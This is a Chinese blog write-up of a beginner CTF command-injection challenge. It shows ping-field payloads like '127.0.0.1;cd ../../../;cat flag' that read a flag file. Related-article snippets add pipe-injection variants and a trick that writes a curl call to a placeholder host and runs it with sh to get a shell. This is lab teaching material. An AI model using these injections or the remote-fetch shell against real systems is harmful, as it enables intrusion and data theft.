[ACTF2020 新生赛]Exec

最新推荐文章于 2024-07-17 14:45:12 发布
最新推荐文章于 2024-07-17 14:45:12 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: BUUCTF——WEB 文章标签: 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuanqiqi_/article/details/126651688
版权
本文介绍了渗透测试中常见的PHP exec命令执行漏洞。通过分析,展示了如何利用该漏洞执行系统命令,例如ls和cd来查找目录,最终使用cat命令读取flag文件内容。这个过程揭示了Web应用安全中的一个重要概念,即如何防止用户输入导致的恶意命令执行。
摘要由CSDN通过智能技术生成

渗透命令执行漏洞php exec

原理】

当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。

exec() 函数能将字符串作为OS 命令执行,需要输出执行结果。

题目分析】

题目中给出了exec的提示,想到应该是命令执行漏洞,输入命令进行一波尝试

首先尝试一下ls,看是否能查看当前目录下的文件名

 

发现ls命令可以正常执行,接下来利用cd命令,将目录往前面回溯,直到检测flag文件在那一层

127.0.0.1;cd ../../../;ls

成功找到flag文件,利用cat命令将文件内容显示 

127.0.0.1;cd ../../../;cat flag

 

yuanqiqi_
关注
专栏目录
CTF-shell_exec-Wp
qq_28545703的博客
10-29 1483
CTF-shell_exec-Wp 题目是这样的,ping命令测试 查看html源代码看到一个tip 解题过程一 经过大量测试目的其实就是执行cat /flag 但是发现有过滤了空格,这里我们$IFS$9代替 我是利用echo curl http://xxxxx.com/1.php >a ,然后执行sh a这样拿shell的,需要绕过php 最终poc: #第一条,把vps的<?php system('cat /flag')>写进去a `echo$IFS$9curl$IFS$9112h
【学习笔记6】 buu [ACTF2020 新生]Exec
weixin_43553654的博客
05-07 338
打开看到这样一个界面,根据做题经验,这应该是一道考察命令执行的题,但是老套路,先看看源码里有什么 通过查看源码发现什么否没有那什么都说了,直接开始尝试首先因为是让你ping一个地址,这里我们尝试127.0.0.1 显示给127.0.0.1发送了对应数据包,说明ping命令执行成功了,那么我们是不是就可以利用“|”来连接另外一个命令来执行从而得到flag,所以构造pa...
[ACTF2020 新生]Exec1
最新发布
jamesP777的博客
07-17 261
一道很简单的命令注入题目,通过 ls /查看根目录,有flag,cat一下获得flag即可。
BUUCTF [ACTF2020 新生] Exec
Senimo
10-18 972
BUUCTF [ACTF2020 新生] Exec 启动靶机,打开环境: 页面可以执行Ping命令,判断应为命令执行漏洞 尝试输入正常IP127.0.0.1查看其回显: 127.0.0.1 其为正常回显,测试管道连接符|是否能用: 127.0.0.1 | ls 管道连接符|可以正常使用,并且ls命令可以正常执行 查看根目录: 127.0.0.1 | ls / 发现flag文件,使用cat命令查看: 127.0.0.1 | cat /flag 得到flag 基础的通过管道连接符|就可以的命
[ACTF2020 新生]Exec 1
09-19
关于 [ACTF2020 新生]Exec 1 的题目中的命令注入问题,根据引用的内容来分析,可以使用命令注入来解题。在这道题目中,使用命令注入的方式进行解题,首先通过测试命令 "ping 127.0.0.1" 来验证是否可以执行命令...
[actf2020 新生]exec
06-28
exec是一个Python内置函数,用于执行字符串中的Python代码。它的语法如下: exec(object[, globals[, locals]]) 其中,object参数可以是一个字符串或者一个代码对象。globals和locals参数分别表示全局和局部命名...
BUUCTF[ACTF2020 新生]Exec
m0_47745762的博客
07-20 311
一、题目内容 对Linux命令的运用 二、解题步骤 ①从根目录查找flag (1)进入到靶机中 (2)用本机地址随便ping一下,看看能得到那些信息 (3)然后通过ls命令查找当前目录中有哪些文件 (4)查找后发现只有一个index.php的文件,我们查找一下里面是否含有flag的信息 (5)分析PHP代码,发现只有一个isset函数用于判断post传过来的数据是否被提交过来 (6) 我们发现当前目录中并没有关于flag的相关信息,那就可能是在根目录上,我们就挨个返..
ACTF2020 新生]Exec
qq_53689523的博客
02-17 117
考察知识点:远程命令执行漏洞和管道符号。
[ACTF 2020 新生] Exec
Web学习之路
05-22 144
rce 0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值